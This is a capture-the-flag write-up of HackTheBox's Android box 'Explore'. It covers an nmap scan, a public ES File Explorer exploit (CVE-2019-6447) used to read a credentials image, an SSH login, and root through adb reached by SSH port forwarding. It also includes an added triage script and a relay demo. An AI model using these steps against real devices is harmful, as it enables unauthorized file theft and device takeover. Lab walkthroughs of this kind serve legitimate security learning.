Explore Writeup - HackTheBox

Explore is an easy box from HackTheBox. This box is a mobile system, a phone, and it was my first mobile box on HTB.

Pedro Mariano

Welcome to the writeup of the Explore box from HackTheBox. This box is a mobile system, a phone, and it was my first mobile box on HTB. It's not a complex box, but it's interesting.

Let's go!


NMAP

nmap -v -sSV -p 2222,5555,40947,42135,59777 -Pn 10.10.10.247 -T4 -oN nmap/sSV.txt
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
5555/tcp filtered freeciv
40947/tcp open unknown
42135/tcp open http ES File Explorer Name Response httpd
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=7/14%Time=60EEEAD6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port40947-TCP:V=7.91%I=7%D=7/14%Time=60EEEAD5%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x20
SF:14\x20Jul\x202021\x2013:50:57\x20GMT\r\nContent-Length:\x2022\r\nConten
SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
SF:r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\
SF:x20Precondition\x20Failed\r\nDate:\x20Wed,\x2014\x20Jul\x202021\x2013:5
SF:0:57\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\
SF:.0\x20501\x20Not\x20Implemented\r\nDate:\x20Wed,\x2014\x20Jul\x202021\x
SF:2013:51:02\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pla
SF:in;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x2
SF:0supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20R
SF:equest\r\nDate:\x20Wed,\x2014\x20Jul\x202021\x2013:51:02\x20GMT\r\nCont
SF:ent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r
SF:\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:
SF:\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDa
SF:te:\x20Wed,\x2014\x20Jul\x202021\x2013:51:18\x20GMT\r\nContent-Length:\
SF:x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection
SF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq
SF:,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x2014\x20Jul\x
SF:202021\x2013:51:18\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20
SF:text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\
SF:x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?
SF:\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSe
SF:rverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x201
SF:4\x20Jul\x202021\x2013:51:18\x20GMT\r\nContent-Length:\x2054\r\nContent
SF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r
SF:\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20msts
SF:hash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
SF:ate:\x20Wed,\x2014\x20Jul\x202021\x2013:51:18\x20GMT\r\nContent-Length:
SF:\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0
SF:e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");
Service Info: Device: phone

According to the scan (note the "Service Info: Device: phone" line), this is a phone...

Researching the identified services, I found some interesting information.

JSONAPI is a plugin for Bukkit that allows you to access data and other information about your server and your players through a simple, yet secure, HTTP API. This allows you to make awesome websites, iPhone apps, and a way for your players to purchase goods online and automatically receive them in game. - https://github.com/alecgorge/jsonapi

Port 42135 is running ES File Explorer, which also creates an HTTP service bound to port 59777, and a quick search turns up a public exploit for it (CVE-2019-6447).
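To turn the scan above and the service research into something repeatable, here is a small triage script added for this writeup (it is not part of the original post or of any tool the box runs). It parses nmap's normal (-oN) port table, picks up the "Service Info: Device:" line, and applies a handful of rules written from a defender's point of view: the ES File Explorer HTTP interface and its CVE-2019-6447 file-read issue, the adb-over-TCP port 5555, the fingerprint mismatch on 59777, and SSH on a non-standard port. The sample scan text is copied from the writeup; the rule notes are the editor's own.

```python
"""Parse nmap -oN output and flag services worth a second look.

Added example for this writeup, not code from the original post. SAMPLE_SCAN
reproduces the port table from the writeup; the triage rules and their notes
are the editor's additions and are intentionally narrow.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the port table and Service Info line from the scan above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
5555/tcp filtered freeciv
40947/tcp open unknown
42135/tcp open http ES File Explorer Name Response httpd
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Service Info: Device: phone
"""

# One port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class ScanResult:
    ports: List[Port]
    device: Optional[str]  # value of "Service Info: Device:", if present


def parse_nmap(text: str) -> ScanResult:
    """Extract the port table and the device type from nmap normal output."""
    ports: List[Port] = []
    device: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            number, proto, state, service, version = m.groups()
            ports.append(Port(int(number), proto, state, service, version or ""))
            continue
        if line.startswith("Service Info:"):
            dm = re.search(r"Device:\s*([^;]+)", line)
            if dm:
                device = dm.group(1).strip()
    return ScanResult(ports, device)


def triage(result: ScanResult) -> List[str]:
    """Return one finding per port that matches an editor-defined triage rule."""
    findings: List[str] = []
    for p in result.ports:
        label = f"{p.number}/{p.proto}"
        desc = f"{p.service} {p.version}".lower()
        if "es file explorer" in desc:
            findings.append(
                f"{label}: ES File Explorer; its HTTP interface on 59777 is affected by "
                "CVE-2019-6447 (unauthenticated file listing/read on the device storage); "
                "update or remove the app and keep the device off untrusted networks"
            )
        elif p.number == 59777 and result.device == "phone":
            # nmap matched a Minecraft plugin signature; on an Android device this
            # port belongs to the ES File Explorer HTTP server (see the writeup).
            findings.append(
                f"{label}: fingerprinted as '{p.version}', but on an Android device "
                "59777 is the ES File Explorer HTTP port; treat the match as a false positive"
            )
        elif p.number == 5555:
            findings.append(
                f"{label}: adb-over-TCP port ({p.state}); a loopback-only adb is still "
                "reachable by any account with a shell on the device, so disable adb "
                "tcpip on devices that are not being developed on"
            )
        elif p.service == "ssh":
            findings.append(
                f"{label}: SSH on a non-standard port; check the banner for third-party "
                "servers (here 'SSH Server - Banana Studio') and prefer key-based auth"
            )
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap(SAMPLE_SCAN)):
        print(finding)
```

The 59777 rule only fires when the scan itself says the device is a phone, which keeps the script from second-guessing nmap on an actual game server. Feed it the -oN file from your own scans (they use wider spacing than the copy above; the regex tolerates that).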

searchsploit ES File Explorer

Using this exploit I could list and read some files, and looking carefully I found an interesting .jpg.

python3 ESFileExploIt.py listPics 10.10.10.247
python3 ESFileExploIt.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
PS: This image is cropped!

This .jpg has notes that look like credentials... As enumerated before, the SSH service is running on port 2222, and using these credentials we were able to log in successfully.

ssh kristi@10.10.10.247 -p 2222

Now we are inside and can find the user flag under /sdcard.


Privilege Escalation

Looking for a way to own the Android system, I read up on Android Debug Bridge (adb), a development tool that lets a computer communicate with an Android device, including through a shell.

According to the documentation, adb listens on local port 5555 (running as "system"), and it is possible to connect to it over USB after setting the configured port. This "restriction" can be bypassed, however, by forwarding the port to our machine, in this case using SSH.

ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222

After entering the password to establish the connection, the SSH shell starts, and in another terminal we can see the phone's localhost port 5555 forwarded to our machine. With that, we can interact with this port, and we will use adb to do so.

adb connect localhost:5555
adb shell

After connecting and getting a shell with adb, we are inside again, this time through adb.
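The -L step above is the whole lesson of this box for anyone who has to defend Android (or any) hosts: a service bound to 127.0.0.1 is only protected from the network, not from an account that already has a shell on the host. The relay below is an added example (not code from the writeup, and not how OpenSSH implements forwarding) that reproduces the mechanism of "ssh -L 5555:localhost:5555" on a single machine so it can be run offline: a constructed stand-in for the loopback-only adb daemon, and a forwarder that listens on another socket and copies bytes in both directions. In the real scenario the listening half runs on the tester's machine and the connecting half runs inside the SSH session on the phone; here both halves share one host and use ephemeral ports.

```python
"""Minimal TCP relay showing what `ssh -L <local>:localhost:<remote>` does.

Added example, not from the writeup. start_device_service() is a constructed
stand-in for the phone's loopback-only adb daemon; start_forwarder() plays the
role of the SSH local forward. Defensive takeaway: binding to loopback is not a
trust boundary once any account on the host can open sockets, so adb-over-TCP
should simply be off on devices that are not under active development.
"""
import socket
import threading


def start_device_service() -> int:
    """Constructed loopback-only service: answers each connection with b'device:' + data.

    Returns the ephemeral port it is listening on (stands in for adb's 5555).
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            with conn:
                data = conn.recv(4096)
                conn.sendall(b"device:" + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def _pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src closes, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(target_host: str, target_port: int,
                    listen_host: str = "127.0.0.1", listen_port: int = 0) -> int:
    """Listen on listen_host:listen_port and relay every client to target_host:target_port.

    This is the `-L` semantics: the listener is where the tester sits, the target is
    what the far side of the tunnel can reach. Returns the actual listening port.
    """
    lst = socket.socket()
    lst.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lst.bind((listen_host, listen_port))
    lst.listen()

    def accept_loop() -> None:
        while True:
            client, _ = lst.accept()
            upstream = socket.create_connection((target_host, target_port))
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lst.getsockname()[1]


def talk(port: int, payload: bytes) -> bytes:
    """Send payload to 127.0.0.1:port, half-close, and return everything read back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            c = s.recv(4096)
            if not c:
                break
            chunks.append(c)
    return b"".join(chunks)


def demo() -> bytes:
    """Reach the loopback-only service through the relay instead of directly."""
    device_port = start_device_service()
    fwd_port = start_forwarder("127.0.0.1", device_port)
    return talk(fwd_port, b"hello")


if __name__ == "__main__":
    print(demo())  # the reply arrives through the relay, unchanged
```

Nothing in the relay inspects or understands the adb protocol; it is pure byte copying, which is exactly why a loopback-only listener gains nothing from the binding address once a second process on the host is willing to act as the relay.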


adb is running with elevated privileges, so we can escalate to root with the simple command su root.


And now, as root, I could find the root flag using the find command.


Thanks for reading and feel free to pingback a coffee ;D

naP0
